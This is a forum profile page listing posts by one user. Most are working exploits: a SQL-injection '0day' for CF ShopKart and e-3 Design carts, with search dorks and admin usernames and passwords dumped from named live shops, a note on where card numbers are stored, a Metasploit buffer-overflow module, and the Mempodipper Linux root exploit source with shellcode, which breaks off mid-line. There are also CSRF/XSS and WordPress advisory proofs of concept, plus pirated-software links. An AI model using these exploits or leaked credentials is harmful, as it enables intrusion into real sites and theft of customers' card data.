Jump to content

The_Arhitect

Active Members
 View Profile  See their activity

  • Posts

    425

  • Joined

  • Last visited

  • Days Won

    2

 Content Type 

Everything posted by The_Arhitect

  1. The_Arhitect
    There is nothing.
  2. The_Arhitect

    Free Music

    The_Arhitect posted a topic in Linkuri

    Free Music -Option to search for entire albums OR songs (search, then tabs will become available) -Pulls music from three more file sharing sites (and removed [removed]) -Added search example -Entirely ad free -More coming soon Download music for free now at MosesMusic.net - Music Search Engine
  3. The_Arhitect
    Propunerea pentru Eurovision Romania by Radio 21 - Video - Trilulilu
  4. The_Arhitect
    #1 YouTube Software On The Internet TUBESPY The #1 YouTube Software On The Internet Tubespy Allows You to Expertly Tap Into One of the Biggest Sources of Targeted Traffic On the Internet...And It Lets You Do it TODAY! Introducing....Tubespy We all know Youtube is the largest video website around today and it's indeed a huge cash cow to grow your business and to flood your Clickbank accounts with cash. The only problem is, most of you have no idea how to effectively get your links displayed. And what is worse is those of you who do know that it can takes hours and hours of research. NOT ANY MORE!!! Watch this video for a live demo of how Tubespy works! Salespage: http://www.warriorforum.com/warrior-special-offers-forum/422346-re-warrior-special-offer-week-2700-sold-1-youtube-software-internet-rave-reviews.html Download: http://www.filesonic.it/file/1570962221/TubeSpy.zip http://www.mediafire.com/?rz3hjl5lmnd3dby
  5. The_Arhitect
    0Day Exploit 1 - Shopping Cart. # Exploit Title: CF Shopkart Shopping Site Engine [MSAcess&MYSQL SQL Injection] 0day # Date: 12/1/12 # Author: Srblche # Vendor or Software Link: http://www.webstoresltd.com/webstores.cfm and www.cfshopkart.com/ # Version: v4.x.x - v5.x.x # Category:: Webapps # Google dork: inurl:.cfm?Action=ViewDetails + "Website Content for" # Tested on: Windows 7 and Backtrack ## 18,600 results ## EXPLOIT: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=1 [SQLi HERE] Vuln Link: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=29 In Depth Analysis: Most CF ShopKart scripts runs either MSAccess or MYSQLv5 databases. However we can get through both. The admin directory is always located at /admin/ This 0day was made for Srblche. --------------------- TABLE [orders] CONTAINS CREDIT CARD NUMBERS, EXPIRY and SECURITY CODES TABLE [users] CONTAINS ADMIN INFO ADMIN PANEL LINK WILL ALWAYS BE AT [/admin] --------------------- MSACCESS HELP - [+] Table Names of CF ShopKart -- categories checkoutheader companyinfo contacts customerhistory discounts emaillist gallery gallerycats gallerycomments gallerynotes graphics help homepage imagecategories ipcountries links logins options order\_no orderdetails orders --------------------------->> CreditCardType,CreditCardNumber,CreditCardExpire,CCConfirmationNumber pages products promos sales sellingareas sentmessages settings settings2 shippingsurcharges shippingtable1 shippingtable2 shippingtable3 shippingtable4 shippingtable5 shippingtypes shoppingcarts stats stats\_archive storeheader taxes temporders upsconfig users ---------------------------------->> UserID,UserName,Password,UserLevel wishlistitems wishlists -------------------------------------------------------------------------------- https://www.streetsourceleds.com/(secure)/admin//admin.cfm Data Found: UserID,UserName,Password,UserLevel=20^admin^incentives^Admin Data Found: UserID,UserName,Password,UserLevel=22^stalerico^kazoo^Admin CVV's in only some orders. -------------------------------------------------------------------------------- https://www.zijagear.com/shop/admin/admin.cfm admin:taylor12 (paypal shop, no cc's found unless setting changed in options to store cc details) -------------------------------------------------------------------------------- EDIT NEW DORK : intext:"Powered by CFShopKart" 1 MORE DORK: inurl:/index.cfm?carttoken= (About 317,000 results (0.37 seconds) http://www.ktlcc.com/handwsportshop.com/shop/admin admin:taylor12 ============================================================= http://www.augersidekick.com Column Data: admin Data Found: username=admin Length of 'Column Data' is 10 Column Data: chrisnmarc Data Found: password=chrisnmarc
      • 2
      • Upvote
  6. The_Arhitect
    E-3 Design Shopping Cart 0Day Exploit. Shopping cart exploit. MsAccess Blind. Dorks: intext:"Website by e-3 Design." inurl:"/portfolio/content.cfm?pageType=" inurl:"content.cfm?pageType=" intitle:"portfolio" ---------------------------- http://www.oceanartshawaii.com/content.cfm?pageID=15 Data Found: password=jeHni81F Data Found: username=lardav Data Found: password=75oceana11 Data Found: username=glenn http://www.oceanartshawaii.com/administration/ -------------------------------------------- http://www.nicolerubio.com/content.cfm?pageID=35 Data Found: username=lardav Data Found: password=jeHni81F Data Found: username=nicole Data Found: password=ag81Ln3 Data Found: username=nicole Data Found: password=ag81Ln3 Data Found: username=nicole ------------- http://www.lisawalshphotography.com/content.cfm?pageID=31 Data Found: username=lardav Data Found: password=jeHni81F Data Found: username=lisa Data Found: password=jeHni81F http://www.lisawalshphotography.com/administration/ -------------------------------------------------- http://brianzeglis.com/content.cfm?pageID=2 Data Found: username=lardav Data Found: password=jeHni81F Data Found: username=brian Data Found: password=b22zeg9 http://brianzeglis.com/administration/ -------------------------------------------------- http://www.stevesullyphoto.com/content.cfm?pageID=39
  7. The_Arhitect
    Download : SteamRP by Ubaroo.rar Pass: ags#%321
  8. The_Arhitect
    Si-au gasit si astia nasu
  9. The_Arhitect
    HP Diagnostics Server magentservice.exe Overflow require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'HP Diagnostics Server magentservice.exe overflow', 'Description' => %q{ This module exploits a stack buffer overflow in HP Diagnostics Server magentservice.exe service. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. Originally found and posted by AbdulAziz Harir via ZDI. }, 'Author' => [ 'AbdulAziz Hariri', # Original discovery 'hal', # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['OSVDB', '72815'], ['CVE', '2011-4789'], ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-016/'] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'seh', 'SSL' => true, 'SSLVersion' => 'SSL3' }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'StackAdjustment' => -3500 }, 'Platform' => 'win', 'DefaultTarget' => 0, 'Targets' => [ [ 'Diagnostics Server 9.10', { # pop esi # pop ebx # ret 10 # magentservice.exe 'Ret' => 0x780c8f1f } ] ], 'DisclosureDate' => 'Jan 12 2012')) register_options([Opt::RPORT(23472)], self.class) end def exploit req = "\x00\x00\x00\x00" req << rand_text_alpha_upper(1092) req << generate_seh_payload(target.ret) connect sock.put(req) handler disconnect end end Sursa: HP Diagnostics Server magentservice.exe Overflow
  10. The_Arhitect
    Dublicate Product Code
  11. The_Arhitect
    Stoneware WebNetwork6 Multiple Vulnerabilities Stoneware WebNetwork6 Vulnerability Assessment * CVE-2012-0285 – XSS * CVE-2012-0286 - CSRF Conducted by: * Leland Public Schools (Stoneware Customer) * Jacob Holcomb (Network Engineer for LPS) Conducted for: * Leland Public Schools (Purchaser of WebNetwork product. Test was to assure cloud security) * Stoneware INC. (Discovered Zero Day vulnerabilities reported to support in 11/2011 & 12/2011) Date(s) Conducted: * 11/2011 – Started initial Web application penetration testing * 12/29/2011 – Started testing of Stoneware’s beta SP8 patch to resolve zero day vulnerabilities - Executive Summary The following reports details the findings from the security assessment performed by Jacob Holcomb of Leland Public Schools for the clients listed in the “Conducted for” heading. -Web Vulnerability Assessment- Deficiencies Noted The following findings were discovered, noted, and reported during the web application assessment. * WebNetwork6: o Six stored Cross Site Scripting (XSS) Zero Day vulnerabilities discovered in the WebNetwork6 product. o One Cross Site Request Forgery (CSRF) Zero Day vulnerabilities discovered in the WebNetwork6 product. Overall Summary The web application penetration test uncovered several deficiencies in the security structure of the WebNetwork6 private/hybrid cloud solution. - Findings and Recommendations The following Zero Day findings were discovered and disclosed through manual testing and were not disclosed by an automated web application security scanner (Such as Nessus, Acunetix, etc). Recommendations to correct the issues are based off of web development best practices according to OWASP (Open Web Application Security Project) and do not reflect the changes implemented by Stoneware INC. to address the security concerns in the WebNetwork6 product outlined in this document. Please see the section titled “Vendors solution to the problem” for a full comprehensive list of the actions taken to resolve the reported issues. -WebNetwork6 Vulnerability Findings- * XSS threats found. Input supplied by the user is not properly validated and sanitized by the Web Server application code prior to submitting the data for processing in multiple parts of the WebNetwork6 application. o This flaw in business programming logic allows malicious users to use the Cross Site Scripting attack vector to submit and store executable code on the server hosting WebNetwork that will be executed in a users browser. o XSS flaws occur when an application includes user-supplied input in a webpage that is sent to the browser without first properly validating or escaping (Sanitizing) that content. o Cross Site Scripting allows an attacker to execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, etc. * CSRF threat found. Requests sent to the Web Server application do not contain any sort of unique identifier that is tied to the users session. o This flaw in business programming logic allows malicious users to use the Cross Site Request Forgery attack vector to submit a falsified HTTP request to the server and initiate a state change of user data/information on the server. o Cross Site Request Forgery (CSRF) takes advantage of a web applications logic and allows attackers to predict all the details of a particular action. Browsers send session ID’s (cookies) for the requested website automatically when requesting that site, so an attacker can create a malicious web page, HTML post, or e-mail which then generates a forged request indistinguishable from the legitimate request and gets submitted to the server for processing. o Malicious hackers can cause victims (Administrator or lesser privileged users) to change any data the victim is allowed to change or perform any action the victim is authorized to use. The user must be logged in for this attack to work. o The CSRF can be exploited via the XSS attack vector as well using HTML GET request versus HTML POST request. -Common Vulnerabilities and Exposure (CVE)- The Common Vulnerabilities and Exposures (CVE) project has assigned the following CVE’s to the issues outlined in this web application penetration test report. * CVE-2012-0285 – XSS * CVE-2012-0286 - CSRF -WebNetwork6 Vulnerability Solutions- * XSS o All untrusted data (user data) should be properly escaped (Sanitized) based on the HTML context that the data is going to be placed into. o Validate ALL input. If input is encoded, decode it, and then validate the length, type, characters, and format of the data being passed as input. * CSRF o To prevent CSRF the web server application should include an unpredictable synchronizer token that is unique for each HTTP request made or per user session. o The preferred option is to include the unique token in a hidden field. This will never reveal the value in the URL and is put into the body of the HTTP request being sent to the server for processing o The synchronizer token can also be placed in the URL itself as a URL parameter. Doing so is not recommended as it divulges this information to an attacker. CSRF Exploitation: In the following example we use CSRF to forge a HTTP POST request that will update or configure a users alternate e-mail, password reset questions, and password reset question answers. The user must be logged in for CSRF to work. Exploited URL: https://NameOfServer/apps/selfService/resetPasswordOptions.jsp HTML code for forged POST request: <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'> <html lang="en"> <head> <title>CSRF(POST):BY Jacob Holcomb</title> </head> <body> <form action="https://SERVERNAME/apps/selfService/resetPasswordOptions.jsp" id="formid" method="post"> <input type="hidden" name="submitted" value="submit" /> <input type="hidden" name="isSimpleResetEnabled" value="false" /> <input type="hidden" name="m_question1" value="What is your mother's maiden name?" /> <input type="hidden" name="m_answer1" value="null" /> <input type="hidden" name="h_answer1" value="null" /> <input type="hidden" name="m_question2" value="What is the city you were born in?" /> <input type="hidden" name="m_answer2" value="null" /> <input type="hidden" name="h_answer2" value="null" /> <input type="hidden" name="altemail" value="enteremail@here.com" /> </form> <script> document.getElementById('formid').submit(); </script> </body> </html> XSS Exploitation: In the following example we use HTML tags to embed malicious code on the server hosting the WebNetwork6 application. This task is accomplished by inputting tagged HTML code in fields that accept user input. I will provide a few code snippets that were used in testing which you can find below along with the vulnerable JavaScript script that allows us to embed the arbitrary code through out the WebNetwork6 product. The affected locations of the webNetwork6 product susceptible to XSS are the “My Blog”, “TeamPages”, and “News and Articles” features. Each of these sections allows us to post content to the following JavaScript (Body of the post), which does not sanitize user input. The subject line (Post title) is also susceptible to persistent XSS. Two attacks possible per WebNetwork6 feature. Exploited URL (Input Field): https://NameOfServer/swDashboard/pEdit/pinEditor.jsp?id=oPinEditor&crossdomain=false&autoFocus=false&new=true GET /swDashboard/pEdit/pinEditor.jsp?id=oPinEditor&crossdomain=false&autoFocus=false&new=true HTTP/1.1 Host: host.domainname.com User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 DNT: 1 Referer: https://hostname/community/blog.jsp?blogName=personal Cookie: SWARESESSIONID=COOKIE VALUE HERE; SWARESESSIONID=COOKIE VALUE HERE; CStoneSessionID=freire-COOKIE VALUE HERE Connection: keep-alive *The URL listed above in the HTML GET request is a JavaScript text editor that does not properly validate/sanitize user input. XSS Code snippets: * <script>alert(‘XSS Test’)</script> * <script>alert(document.cookie)</script> * <imgsrc="https://ServerNameHere/apps/selfService/resetPasswordOptions.jsp?submitted=submit&isSimpleResetEnabled=false&m_question1=What%20is%20your%20mother's%20maiden%20name%3F&m_answer1=For%20security%20purposes%2C%20your%20saved%20answers%20are%20not%20being%20displayed.&h_answer1=9xxxxxxxxxxxd0e3&m_question2=What%20is%20the%20city%20you%20were%20born%20in%3F&m_answer2=For%20security%20purposes%2C%20your%20saved%20answers%20are%20not%20being%20displayed.&h_answer2=9xxxxxxxxxxxd0e3&altemail=xxx%40xxx.com" /> o The imgsrc HTML tag above allows us to submit a GET request to the server and perform our CSRF attack using a XSS attack vector to submit the falsified request. Compromise * The CSRF reported allows for a breach in directory service user accounts, which can lead to a compromise of the entire web application configuration, server hosting the web application, and potentially other servers, end nodes, and domain services on the domain network. * The six stored (persistent) XSS reported allows for information disclosure and arbitrary code execution that can lead to the compromise of a users account, machine, or other sensitive information. - Vendors Solution to the problem Stoneware has published a security bulletin on the issues outlined in this report. You can find the contents of the bulletin at http://www.stone-ware.com/swql.jsp?kb=d1960 An e-mail advisory was also made available to Stoneware customers, which you can find below. Resolution * Cross-Site Request Forgery - CSRF issues were addressed by inclusion of a required, session-limited security token. * Cross-Site Scripting - XSS issues were addressed by escaping (Sanitizing) the untrusted input data. Stoneware Security Bulletin January 20, 2012 Summary This security bulletin is provided to notify customers of two security vulnerabilities with the webNetwork product. Stoneware has released webNetwork 6.0 Service Pack 8 to address these issues. The vulnerabilities could allow for unintended information disclosure and breach of user accounts. The impact of exploitation of these vulnerabilities depend on the sensitivity of the content contained within webNetwork. Recommendation Stoneware recommends that customers upgrade to webNetwork 6.0 Service Pack 8 at their earliest opportunity. Acknowledgements Stoneware would like to thank Jacob Holcomb of Leland Public Schools for reporting CVE-2012-0285 and CVE-2012-0286. Disclaimer The information provided by Stoneware in this bulletin and in the Stoneware Knowledge Base is provided "as is" without warranty of any kind. Stoneware disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Stoneware, Inc. or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Stoneware, Inc. or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Revisions 1.0, 2012-January-20, Bulletin published. Sursa: Stoneware WebNetwork6 Multiple Vulnerabilities
  12. The_Arhitect
    WordPress <= 3.3.1 Multiple Vulnerabilities Trustwave's SpiderLabs Security Advisory TWSL2012-002: Multiple Vulnerabilities in WordPress https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt Published: 1/24/12 Version: 1.0 Vendor: WordPress (http://wordpress.org/) Product: WordPress Version affected: 3.3.1 and prior Product description: WordPress is a free and open source blogging tool and publishing platform powered by PHP and MySQL. Credit: Jonathan Claudius of Trustwave SpiderLabs Finding 1: PHP Code Execution and Persistent Cross Site Scripting Vulnerabilities via 'setup-config.php' page. CVE: CVE-2011-4899 The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. This typically requires a user to have valid MySQL credentials to complete. However, a malicious user can host their own MySQL database server and can successfully complete the WordPress installation without having valid credentials on the target system. After the successful installation of WordPress, a malicious user can inject malicious PHP code via the WordPress Themes editor. In addition, with control of the database store, malicious Javascript can be injected into the content of WordPress yielding persistent Cross Site Scripting. Proof of Concept: Servers Involved A.B.C.D = Target WordPress Web Server W.X.Y.Z = Malicious User's MySQL Instance 1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306 2.) Performs POST/GET Requests to Install WordPress into MySQL Instance Request #1 ---------- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do Content-Type: application/x-www-form-urlencoded Content-Length: 81 dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit Request #2 ---------- GET /wp-admin/install.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2 Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT 3.) Get PHP Code Execution Malicious user edits 404.php via Themes Editor as follows: <?php phpinfo(); ?> Note #1: Any php file in the theme could be used. Note #2: Depending settings, PHP may be used to execute system commands on webserver. Malicious user performs get request of modified page to execute code. Request ------- GET /wp-content/themes/default/404.php HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 4.) Get Persistent Cross Site Scripting Malicious User Injects Malicious Javascript into their own MySQL database instance MySQL Query ----------- update wp_comments SET comment_content='<script>alert('123')</script>' where comment_content='Hi, this is a comment.<br />To delete \ a comment, just log in and view the post's comments. There you will have the option to edit or delete them.'; Non-malicious User Visits Wordpress installation and has Javascript executed on their browser Request ------- GET /?p=1 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Finding 2: Multiple Cross Site Scripting Vulnerabilities in 'setup-config.php' page CVE: CVE-2012-0782 The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. When using this installation page the user is asked to supply the database name, the server that the database resides on, and a valid MySQL username and password. During this process, malicious users can supply javascript within the "dbname", "dbhost" or "uname" parameters. Upon clicking the submission button, the javascript is rendered in the client's browser. Proof of Concept: Servers Involved A.B.C.D = Target WordPress Web Server Request ------- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 Content-Type: application/x-www-form-urlencoded Content-Length: 112 dbname=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&uname=root&pwd=&dbhost=localhost&prefix=wp_&submit=Submit Finding 3: MySQL Server Username/Password Disclosure Vulnerability via 'setup-config.php' page CVE: CVE-2011-4898 The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. When using this installation page the user is asked to supply the database name, the server the database resides on, and a valid MySQL username and password. Malicious users can omit the "dbname" parameter during this process, allowing them to continually bruteforce MySQL instance usernames and passwords. This includes any local or remote MySQL instances which are accessible to the target web server. This can also be used as a method to proxy MySQL bruteforce attacks against other MySQL instances outside of the target organization. Proof of Concept: Servers Involved A.B.C.D = Target WordPress Web Server L.M.N.O = Any MySQL Server for which the Web Server has network access Request ------- POST /wp-admin/setup-config.php?step=2 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1 Content-Type: application/x-www-form-urlencoded Content-Length: 32 uname=mysql&pwd=mysql&dbhost=L.M.N.O Response (If Password is Valid) ------------------------------- <---snip--> We were able to connect to the database server (which means your username and password is okay) but not able to select the database. <---snip--> Response (If Password is Invalid) --------------------------------- <---snip--> This either means that the username and password information in your wp-config.php file is incorrect or we can't contact the database server at localhost. This could mean your host's database server is down. <---snip--> Vendor Response: Due to the fact that the component in question is an installation script, the vendor has stated that the attack surface is too small to warrant a fix: "We give priority to a better user experience at the install process. It is unlikely a user would go to the trouble of installing a copy of WordPress and then not finishing the setup process more-or-less immediately. The window of opportunity for exploiting such a vulnerability is very small." However, Trustwave SpiderLabs urges caution in situations where the WordPress installation script is provided as part of a default image. This is often done as a convenience on hosting providers, even in cases where the client does not use the software. It is a best practice to ensure that no installation scripts are exposed to outsiders, and these vulnerabilities reinforce the importance of this step. Remediation Steps: No official fix for these issues will be released for the WordPress publishing platform. However, administrators can mitigate these issues by creating strong MySQL passwords and defining rules within a web application firewall (WAF) solution. ModSecurity (http://www.modsecurity.org/) has added rules to the commercial rules feed for these issues, and Trustwave's vulnerability scanning solution, TrustKeeper, has been updated to detect exposed installation scripts. Vendor Communication Timeline: 12/22/11 - Vulnerability disclosed 01/16/12 - Confirmation to release vulnerabilities 01/24/12 - Advisory published References 1. http://www.wordpress.org About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. Sursa: WordPress <= 3.3.1 Multiple Vulnerabilities
  13. The_Arhitect
    Daca faci cumparaturile alea, fale repede la mine la limitat in 2 ore.
  14. The_Arhitect
    Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c Blog post about it is here: http://blog.zx2c4.com/749 # Exploit Title: Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit # Date: Jan 21, 2012 # Author: zx2c4 # Tested on: Gentoo, Ubuntu # Platform: Linux # Category: Local # CVE-2012-0056 /* * Mempodipper * by zx2c4 * * Linux Local Root Exploit * * Rather than put my write up here, per usual, this time I've put it * in a rather lengthy blog post: http://blog.zx2c4.com/749 * * Enjoy. * * - zx2c4 * Jan 21, 2012 * * CVE-2012-0056 */ #define _LARGEFILE64_SOURCE #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/socket.h> #include <sys/un.h> #include <fcntl.h> #include <unistd.h> #include <limits.h> char *socket_path = "/tmp/.sockpuppet"; int send_fd(int fd) { char buf[1]; struct iovec iov; struct msghdr msg; struct cmsghdr *cmsg; struct sockaddr_un addr; int n; int sock; char cms[CMSG_SPACE(sizeof(int))]; if ((sock = socket(AF_UNIX, SOCK_STREAM, 0)) < 0) return -1; memset(&addr, 0, sizeof(addr)); addr.sun_family = AF_UNIX; strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1); if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) < 0) return -1; buf[0] = 0; iov.iov_base = buf; iov.iov_len = 1; memset(&msg, 0, sizeof msg); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = (caddr_t)cms; msg.msg_controllen = CMSG_LEN(sizeof(int)); cmsg = CMSG_FIRSTHDR(&msg); cmsg->cmsg_len = CMSG_LEN(sizeof(int)); cmsg->cmsg_level = SOL_SOCKET; cmsg->cmsg_type = SCM_RIGHTS; memmove(CMSG_DATA(cmsg), &fd, sizeof(int)); if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len) return -1; close(sock); return 0; } int recv_fd() { int listener; int sock; int n; int fd; char buf[1]; struct iovec iov; struct msghdr msg; struct cmsghdr *cmsg; struct sockaddr_un addr; char cms[CMSG_SPACE(sizeof(int))]; if ((listener = socket(AF_UNIX, SOCK_STREAM, 0)) < 0) return -1; memset(&addr, 0, sizeof(addr)); addr.sun_family = AF_UNIX; strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1); unlink(socket_path); if (bind(listener, (struct sockaddr*)&addr, sizeof(addr)) < 0) return -1; if (listen(listener, 1) < 0) return -1; if ((sock = accept(listener, NULL, NULL)) < 0) return -1; iov.iov_base = buf; iov.iov_len = 1; memset(&msg, 0, sizeof msg); msg.msg_name = 0; msg.msg_namelen = 0; msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = (caddr_t)cms; msg.msg_controllen = sizeof cms; if ((n = recvmsg(sock, &msg, 0)) < 0) return -1; if (n == 0) return -1; cmsg = CMSG_FIRSTHDR(&msg); memmove(&fd, CMSG_DATA(cmsg), sizeof(int)); close(sock); close(listener); return fd; } int main(int argc, char **argv) { if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') { char parent_mem[256]; sprintf(parent_mem, "/proc/%s/mem", argv[2]); printf("[+] Opening parent mem %s in child.\n", parent_mem); int fd = open(parent_mem, O_RDWR); if (fd < 0) { perror("[-] open"); return 1; } printf("[+] Sending fd %d to parent.\n", fd); send_fd(fd); return 0; } printf("===============================\n"); printf("= Mempodipper =\n"); printf("= by zx2c4 =\n"); printf("= Jan 21, 2012 =\n"); printf("===============================\n\n"); int parent_pid = getpid(); if (fork()) { printf("[+] Waiting for transferred fd in parent.\n"); int fd = recv_fd(); printf("[+] Received fd at %d.\n", fd); if (fd < 0) { perror("[-] recv_fd"); return -1; } printf("[+] Assigning fd %d to stderr.\n", fd); dup2(2, 6); dup2(fd, 2); unsigned long address; if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o') address = strtoul(argv[2], NULL, 16); else { printf("[+] Reading su for exit@plt.\n"); // Poor man's auto-detection. Do this in memory instead of relying on objdump being installed. FILE *command = popen("objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r"); char result[32]; result[0] = 0; fgets(result, 32, command); pclose(command); address = strtoul(result, NULL, 16); if (address == ULONG_MAX || !address) { printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n"); printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", argv[0], argv[0]); return 1; } printf("[+] Resolved exit@plt to 0x%lx.\n", address); } printf("[+] Calculating su padding.\n"); FILE *command = popen("su this-user-does-not-exist 2>&1", "r"); char result[256]; result[0] = 0; fgets(result, 256, command); pclose(command); unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char); unsigned long offset = address - su_padding; printf("[+] Seeking to offset 0x%lx.\n", offset); lseek64(fd, offset, SEEK_SET); #if defined(__i386__) // See shellcode-32.s in this package for the source. char shellcode[] = "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3" "\x06\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89" "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd" "\x80"; #elif defined(__x86_64__) // See shellcode-64.s in this package for the source. char shellcode[] = "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40" "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69" "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb" "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48" "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"; #else #error "That platform is not supported." #endif printf("[+] Executing 